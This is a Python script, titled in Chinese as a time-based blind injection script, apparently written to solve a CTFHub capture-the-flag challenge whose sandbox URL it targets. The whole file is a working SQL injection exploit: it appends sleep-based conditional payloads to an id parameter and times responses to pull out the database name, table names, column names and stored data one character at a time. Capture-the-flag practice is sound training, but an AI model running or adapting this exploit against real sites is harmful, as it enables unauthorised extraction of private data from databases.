时间盲注脚本
import requests
import string
import time
def get_database(url):
database = ''
for i in range(1, 9):
for j in string.ascii_letters:
target = url + 'if(substr(database(),%d,1)="%s",sleep(3),1)' % (i, j)
time1 = time.time()
request = requests.get(target)
time2 = time.time()
if time2 - time1 > 2:
database += j
print(database)
break
print('Database:', database)
return database
def get_table(url, database):
tablesname = []
for i in range(0, 2):
name = ''
for j in range(1, 6):
for k in string.ascii_letters:
target = url + 'if(substr((select table_name from information_schema.tables where table_schema="' +\
database + '" limit %d,1),%d,1)="%s",sleep(3),1)' % (i, j, k)
time1 = time.time()
request = requests.get(target)
time2 = time.time()
if time2 - time1 > 2:
name += k
print(name)
break
tablesname.append(name)
print('Tablesame:', tablesname)
return input("Choose TableName:")
def get_columns(url, tablename, database):
columns = []
for i in range(0, 3):
name = ''
for j in range(1, 6):
for k in string.ascii_letters:
target = url + 'if(substr((select column_name from information_schema.columns where table_name="'\
+ tablename + '" and table_schema="' + database\
+ '" limit %d,1),%d,1)="%s",sleep(3),1)' % (i, j, k)
time1 = time.time()
request = requests.get(target)
time2 = time.time()
if time2 - time1 > 2:
name += k
print(name)
break
columns.append(name)
print('Columnsname:', columns)
return input("Choose Columnname:")
def getdata(url, tablename, database, columns):
data = ''
for i in range(0, 50):
for j in string.digits\
+ string.ascii_letters\
+ string.punctuation:
target = url + 'if(substr((select '\
+columns\
+ ' from ' + tablename\
+ '),%d,1)="%s",sleep(3),1)' % (i, j)
time1 = time.time()
request = requests.get(target)
time2 = time.time()
if time2 - time1 > 2:
data += j
print(data)
break
print(data)
if __name__ == "__main__":
url = "http://challenge-71506a2f58c546c4.sandbox.ctfhub.com:10080/?id="
database = get_database(url)
tablename = get_table(url, database)
columns=get_columns(url, tablename, database)
getdata(url, tablename, database,columns)